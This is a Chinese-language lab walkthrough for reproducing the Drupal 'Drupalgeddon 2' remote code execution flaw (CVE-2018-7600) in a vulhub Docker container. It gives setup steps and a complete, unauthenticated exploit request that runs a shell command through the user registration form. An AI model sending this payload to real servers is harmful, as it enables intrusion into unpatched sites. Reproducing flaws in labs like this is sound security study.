Drupal Drupalgeddon 2 远程代码执行漏洞（CVE-2018-7600）

声明

好好学习，天天向上

漏洞描述

Drupal 是一款用量庞大的CMS，其6/7/8版本的Form API中存在一处远程代码执行漏洞。

影响范围

Drupal 6.x，7.x，8.x

复现过程

这里使用8.5.0版本

使用vulhub

/app/vulhub-master/drupal/CVE-2018-7600

使用docker启动

docker-compose build
docker-compose up -d

如果报错，请按照这个进行，如果不报错，则忽略

启动后进入docker，需要改一些东西，不然安装不成功，进入docker后（默认在/var/www/html下），执行

mkdir sites/default/files
cp ./sites/default/default.settings.php ./sites/default/settings.php
chown -R www-data:www-data ../html/

访问

http://192.168.239.129:8080

将会看到drupal的安装页面，一路默认配置下一步安装。因为没有mysql环境，所以安装的时候可以选择sqlite数据库。

安装完后，抓包，修改，不需要登录和cookie

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.239.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

关闭镜像（每次用完后关闭）

docker-compose down

docker-compose常用命令

拉镜像（进入到vulhub某个具体目录后）

docker-compose build
docker-compose up -d

镜像查询（查到的第一列就是ID值）

docker ps -a

进入指定镜像里面（根据上一条查出的ID进入）

docker exec -it ID /bin/bash

关闭镜像（每次用完后关闭）

docker-compose down